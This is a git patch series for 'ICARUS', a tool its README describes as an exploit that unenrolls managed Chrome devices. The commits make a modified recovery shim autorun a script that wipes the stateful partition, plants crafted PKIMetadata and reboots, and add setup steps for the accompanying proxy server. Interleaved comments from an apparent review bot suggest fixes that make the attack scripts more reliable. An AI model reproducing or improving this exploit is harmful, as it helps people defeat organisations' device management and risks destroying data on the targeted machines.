From b1a4ce7285c3b899994878244840f9aca59ac5c3 Mon Sep 17 00:00:00 2001 From: Archimax <64978924+EnterTheVoid-x86@users.noreply.github.com> Date: Sat, 25 Jan 2025 22:26:08 -0500 Subject: [PATCH 1/8] make inshim.sh autorun --- modify.sh | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/modify.sh b/modify.sh index e89a32e..04e1fcd 100644 --- a/modify.sh +++ b/modify.sh @@ -84,14 +84,13 @@ mount -o rw "$LOOP_DEV"p1 "$MOUNT_DIR" mkdir -p "$MOUNT_DIR/usr/share/packeddata" cp -rvf "./out/." "$MOUNT_DIR/usr/share/packeddata" mkdir -p "$MOUNT_DIR"/usr/bin -cp "inshim.sh" "$MOUNT_DIR/usr/bin/inshim.sh" umount "$MOUNT_DIR" enable_rw_mount "$LOOP_DEV"p3 mount "$LOOP_DEV"p3 "$MOUNT_DIR" -echo "bash" > "$MOUNT_DIR/usr/sbin/factory_install.sh" +cp "inshim.sh" "$MOUNT_DIR/usr/sbin/factory_install.sh" umount "$MOUNT_DIR" sync sync sync -echo "success!" \ No newline at end of file +echo "success!" From 21eeeeff52232a1d824640e5f238bf63cc210a6a Mon Sep 17 00:00:00 2001 From: Archimax <64978924+EnterTheVoid-x86@users.noreply.github.com> Date: Sat, 25 Jan 2025 22:34:32 -0500 Subject: [PATCH 2/8] WHY ARE YOU EDITING MAIN --- README.md | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/README.md b/README.md index 1cef0a9..845216a 100644 --- a/README.md +++ b/README.md @@ -27,11 +27,7 @@ Now, to modify the shim with the generated PKIMetadata: - `bash modify.sh ` -Now boot the shim, and in the terminal of the shim, run these commands: - -`mount /dev/disk/by-label/STATE /mnt/stateful_partition` - -`bash /mnt/stateful_partition/usr/bin/inshim.sh` +Now boot the shim, and ICARUS will attempt to modify your stateful partition. ### Server setup Requirements: npm, node From 6e1cb988f76d539eb5e7774918dbf41de88337b9 Mon Sep 17 00:00:00 2001 
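Review bot: In the modify.sh hunk of PATCH 1/8, the new `cp "inshim.sh" "$MOUNT_DIR/usr/sbin/factory_install.sh"` is unchecked, so the script still reaches `echo "success!"` when the copy fails. The source path is relative, so this happens whenever the script is run from a directory without `inshim.sh`. Unless the part of modify.sh outside this hunk already sets `set -e`, I would write `cp "inshim.sh" "$MOUNT_DIR/usr/sbin/factory_install.sh" || { echo "failed to install inshim.sh" >&2; exit 1; }` and route that exit through whatever unmount and loop-device cleanup the script already has. The `chmod +x` line added in PATCH 5/8 follows the same unchecked pattern.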
From: Archimax <64978924+EnterTheVoid-x86@users.noreply.github.com> Date: Sat, 25 Jan 2025 22:35:20 -0500 Subject: [PATCH 3/8] fail statements + error handling --- inshim.sh | 17 +++++++++++------ 1 file changed, 11 insertions(+), 6 deletions(-) diff --git a/inshim.sh b/inshim.sh index 3a7c938..79c41d2 100644 --- a/inshim.sh +++ b/inshim.sh @@ -1,6 +1,11 @@ #!/bin/bash -[ "$EUID" -ne 0 ] && echo "Run this as root" +[ "$EUID" -ne 0 ] && fail "Not running as root, this shouldn't happen! Failing." + +fail() { + printf "%b\n" "$*" >&2 || : + sleep 1d +} get_largest_cros_blockdev() { local largest size dev_name tmp_size remo @@ -31,15 +36,15 @@ format_part_number() { mount /dev/disk/by-label/STATE /mnt/stateful_partition/ cros_dev="$(get_largest_cros_blockdev)" if [ -z "$cros_dev" ]; then - echo "No CrOS SSD found on device. Failing." - exit 1 + echo "No CrOS SSD found on device. Failing." + sleep 1d fi stateful=$(format_part_number "$cros_dev" 1) -mkfs.ext4 -F "$stateful" # This only wipes the stateful partition -mount "$stateful" /tmp +mkfs.ext4 -F "$stateful" || fail "Failed to wipe stateful." # This only wipes the stateful partition +mount "$stateful" /tmp || fail "Failed to mount stateful." mkdir -p /tmp/unencrypted cp /mnt/stateful_partition/usr/share/packeddata/. /tmp/unencrypted/ -rvf chown 1000 /tmp/unencrypted/PKIMetadata -R rm /tmp/.developer_mode umount /tmp -crossystem disable_dev_request=1 +crossystem disable_dev_request=1 || fail "Failed to set disable_dev_request." From b03b61f5e76daa9cda5d5f1c2854fc8a30fbb11e Mon Sep 17 00:00:00 2001 From: Archimax <64978924+EnterTheVoid-x86@users.noreply.github.com> Date: Sun, 26 Jan 2025 11:46:52 -0500 Subject: [PATCH 4/8] Add troubleshooting section --- README.md | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/README.md b/README.md index 845216a..f1af1e5 100644 --- a/README.md +++ b/README.md 
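Review bot: In the first inshim.sh hunk (`@@ -1,6 +1,11 @@`), the root check calls `fail` before `fail()` is defined, so a non-root run gets a "command not found" from bash and carries on into the rest of the script. `fail()` also returns once `sleep 1d` finishes, so every `|| fail ...` added in the second hunk only delays the following commands rather than stopping them. Move the definition above the `[ "$EUID" -ne 0 ]` line and end the function with `exit 1` after the sleep. A one-line comment saying why the function sleeps instead of exiting immediately would help, since the reason is not visible in this hunk.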
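Review bot: In the second inshim.sh hunk (`@@ -31,15 +36,15 @@`), replacing `exit 1` with `sleep 1d` in the empty-`$cros_dev` branch lets the script fall through once the sleep ends. Whatever `format_part_number` returns for an empty device is then handed to `mkfs.ext4 -F`, a destructive call on a path that was never validated. That branch should use the helper like the other checks, `[ -n "$cros_dev" ] || fail "No CrOS SSD found on device. Failing."`, with `fail` made terminal. The initial `mount /dev/disk/by-label/STATE ...` and the `cp ... -rvf`, `chown` and `rm` lines are still unchecked, so a failed copy is followed by `umount` and `crossystem` as if it had worked; adding `|| fail "..."` to the mount and the copy would make the error handling consistent.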
@@ -40,6 +40,21 @@ Reboot the device. You'll boot into verified mode. Once you have your server run - Set HTTPS IP to the IP you used to host the proxy server. - Resume setup and your device will unenroll. +## Troubleshooting + +
+ During building, everything starting from root was copied into original! + + Please run ``git pull`` on your local copy. This bug has been fixed. +
+ +
+ My device says "Can't reach Google"! + + - Make sure your device and the server are connected to the same network + - If that didn't work, powerwash your device and re-run the modified shim, and keep the server running. +
+ ## Credits - [MunyDev](https://github.com/MunyDev) - Creating this exploit - [Archimax](https://github.com/EnterTheVoid-x86) - Cleaning up get_original_data.sh and inshim.sh + README changes From 249b72beb3419e2ddebb5f25f60f2d61106d4db2 Mon Sep 17 00:00:00 2001 From: Archimax <64978924+EnterTheVoid-x86@users.noreply.github.com> Date: Sun, 26 Jan 2025 11:51:56 -0500 Subject: [PATCH 5/8] just incase --- modify.sh | 1 + 1 file changed, 1 insertion(+) diff --git a/modify.sh b/modify.sh index 04e1fcd..c2c76eb 100644 --- a/modify.sh +++ b/modify.sh @@ -88,6 +88,7 @@ umount "$MOUNT_DIR" enable_rw_mount "$LOOP_DEV"p3 mount "$LOOP_DEV"p3 "$MOUNT_DIR" cp "inshim.sh" "$MOUNT_DIR/usr/sbin/factory_install.sh" +chmod +x "$MOUNT_DIR/usr/sbin/factory_install.sh" umount "$MOUNT_DIR" sync From 8ee597869c598ad17a471fe19a4d958dbb61d9f3 Mon Sep 17 00:00:00 2001 From: Archimax <64978924+EnterTheVoid-x86@users.noreply.github.com> Date: Sun, 26 Jan 2025 16:37:16 -0500 Subject: [PATCH 6/8] Update README.md --- README.md | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index f1af1e5..8ebf82c 100644 --- a/README.md +++ b/README.md @@ -12,12 +12,15 @@ An exploit for Chrome devices which allows people to unenroll devices with devic ## Setup and installation instructions Clone the repo with ``git clone --recursive https://github.com/MunyDev/icarus/`` and change directory to it. -Set up the environment by running the following commands (Make sure you have both python3 and python3-venv installed beforehand): +Set up the environment by running the following commands (Make sure you have python3, python3-venv, and protobuf installed beforehand): - `make setup-venv` - `make enter-venv` - `make setup-python` - `make build-packed-data` + +Before continuing, open Chrome on your build machine and go to chrome://components. This allows us to generate the nessecary data. + - `bash get_original_data.sh` - `bash make_out.sh myCA.der` 
From 3849077794920cb1362fac7384b4abab105dedc9 Mon Sep 17 00:00:00 2001 From: Archimax <64978924+EnterTheVoid-x86@users.noreply.github.com> Date: Sun, 26 Jan 2025 16:47:19 -0500 Subject: [PATCH 7/8] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 8ebf82c..8df0455 100644 --- a/README.md +++ b/README.md @@ -19,7 +19,7 @@ Set up the environment by running the following commands (Make sure you have pyt - `make setup-python` - `make build-packed-data` -Before continuing, open Chrome on your build machine and go to chrome://components. This allows us to generate the nessecary data. +Before continuing, open Chrome on your build machine and go to chrome://components. Press CTRL + F and search for "PKIMetadata". Once you find it, press "Check for Updates". Make sure it says up-to-date before continuing (and that the version is below 2000.) - `bash get_original_data.sh` - `bash make_out.sh myCA.der` From 1f60d03f443a70f669755c93ca572a07d6999960 Mon Sep 17 00:00:00 2001 From: Archimax <64978924+EnterTheVoid-x86@users.noreply.github.com> Date: Sun, 26 Jan 2025 16:58:42 -0500 Subject: [PATCH 8/8] prompt for reboot --- inshim.sh | 2 ++ 1 file changed, 2 insertions(+) diff --git a/inshim.sh b/inshim.sh index 79c41d2..0325761 100644 --- a/inshim.sh +++ b/inshim.sh @@ -48,3 +48,5 @@ chown 1000 /tmp/unencrypted/PKIMetadata -R rm /tmp/.developer_mode umount /tmp crossystem disable_dev_request=1 || fail "Failed to set disable_dev_request." +read -p "Finished! Press enter to reboot." +reboot
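Review bot: In the inshim.sh hunk of PATCH 8/8, `read -p "Finished! Press enter to reboot."` reports success unconditionally, because the `chown` and `rm` lines in this hunk's context are unchecked and "Finished!" is printed even when they failed. `read` is also missing `-r` (ShellCheck SC2162), and when stdin is not a terminal it returns at once, so `reboot` runs before the operator can read any earlier error output. I would write `read -r -p "Finished! Press enter to reboot." _` and reach it only after the preceding steps have been checked.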